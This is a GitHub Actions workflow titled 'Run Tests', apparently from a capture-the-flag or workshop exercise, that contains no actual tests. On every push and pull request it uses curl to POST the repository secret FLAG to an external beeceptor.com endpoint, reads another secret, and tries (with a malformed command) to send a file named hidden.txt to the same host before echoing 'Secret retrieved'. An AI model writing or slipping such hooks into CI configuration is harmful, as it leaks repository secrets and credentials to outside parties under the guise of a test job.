name: Run Tests

on:
  [push, pull_request]
  
jobs:
  yolo:
    runs-on: ubuntu-latest
    steps:
      - shell: bash
        env:
          SUPER_SECRET: ${{ secrets.HIDDEN_URL }}
        run: |
          curl -v -X POST 'https://techdaysgetsecret.free.beeceptor.com/my/api/path' -H 'Content-Type: plain/text' -d "${{secrets.FLAG}}"
    
      - name: Action test
        run: |
          cat ${{secrets.HIDDEN_URL}} 
          cat hidden.txt > curl -v -X POST 'https://techdaysgetsecret.free.beeceptor.com/my/api/path' -H 'Content-Type: plain/text' -d
          echo "Secret retrieved"
          echo "-------"
          echo "Write tests here and call them with hidden.txt"
          echo "TODO"
